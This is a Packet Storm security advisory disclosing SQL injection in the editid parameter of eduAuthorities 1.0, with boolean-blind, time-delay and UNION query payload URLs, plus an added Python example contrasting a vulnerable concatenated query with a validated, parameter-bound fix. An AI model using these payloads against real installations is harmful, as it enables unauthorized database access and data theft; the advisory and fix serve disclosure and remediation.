eduAuthorities 1.0 SQL Injection
2024-8-6 21:41:57 Author: packetstormsecurity.com

## Titles: eduAuthorities-1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 07/29/2024
## Vendor: https://www.mayurik.com/
## Software:
https://www.sourcecodester.com/php/16137/online-student-management-system-php-free-download.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The editid parameter appears to be vulnerable to SQL injection attacks. The
payloads 15750083 or 4189=04189 and 58006253 or 7709=7710 were each
submitted in the editid parameter. These two requests resulted in different
responses, indicating that the input is being incorporated into a SQL query
in an unsafe way. Note that automated difference-based tests for SQL
injection flaws can often be unreliable and are prone to false positive
results. You should manually review the reported requests and responses to
confirm whether a vulnerability is actually present.
Additionally, the payload (select*from(select(sleep(20)))a) was submitted
in the editid parameter. The application took 20011 milliseconds to respond
to the request, compared with 3 milliseconds for the original request,
indicating that the injected SQL command caused a time delay. The attacker
can get all information from the system by using this vulnerability!

STATUS: HIGH - Vulnerability
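
An added example, not part of the original advisory or the application's own code: the boolean probe pair from the description, run against a concatenated query and against a validated, parameter-bound one, with a regression check that the fix removes the response difference. Python's sqlite3 stands in for the PHP/MySQL application; the `classes` table and all function names are assumptions.

```python
import sqlite3

# Probe pair quoted in the advisory's description (true / false condition).
TRUE_PROBE = "15750083 or 4189=04189"
FALSE_PROBE = "58006253 or 7709=7710"


def make_db():
    """Constructed sample data; table and column names are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE classes (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO classes VALUES (?, ?)",
                   [(1, "Class A"), (2, "Class B"), (3, "Class C")])
    return db


def lookup_unsafe(db, editid):
    # Vulnerable pattern: the request parameter becomes part of the SQL text.
    return db.execute(
        "SELECT id, name FROM classes WHERE id = " + editid).fetchall()


def lookup_safe(db, editid):
    # Allowlist first: editid must be a plain decimal integer.
    if not (editid.isascii() and editid.isdigit()):
        raise ValueError("editid must be a decimal integer")
    # Then bind it, so the value is never parsed as SQL.
    return db.execute(
        "SELECT id, name FROM classes WHERE id = ?", (int(editid),)).fetchall()


def responses_differ(lookup, db):
    """Regression check: do the true/false probes get different responses?"""
    def run(value):
        try:
            return lookup(db, value)
        except ValueError:
            return "rejected"
    return run(TRUE_PROBE) != run(FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    print("unsafe differs:", responses_differ(lookup_unsafe, db))
    print("safe differs:  ", responses_differ(lookup_safe, db))
    print("legit lookup:  ", lookup_safe(db, "2"))
```

In the PHP application the same two steps correspond to integer validation of `editid` followed by a prepared statement with a bound parameter.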

[+]Exploits:
- SQLi Multiple:
```mysql
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-8488
OR EXTRACTVALUE(2229,CASE WHEN (2229=2229) THEN 2229 ELSE 0x3A END)#
UiVZfrom(select(sleep(3)))a)

Type: UNION query
Title: MySQL UNION query (random number) - 3 columns
Payload: http://pwnedhost.com/eduauth/edit-class-detail.php?editid=-2962
UNION ALL SELECT
8651,8651,CONCAT(0x7176627a71,0x664c6c4a72786a466c676743684468646d676e646d476f535a4f4a64694375516a54746d52426253,0x7171766b71),8651#from(select(sleep(3)))a)
---
```

## Reproduce:
[href](https://www.patreon.com/posts/eduauthorities-1-109562178)

## More:
[href](https://www.nu11secur1ty.com/2024/08/eduauthorities-10-multiple-sqli.html)

## Time spent:
00:37:00


Source: https://packetstormsecurity.com/files/179919/eduauthorities10-sql.txt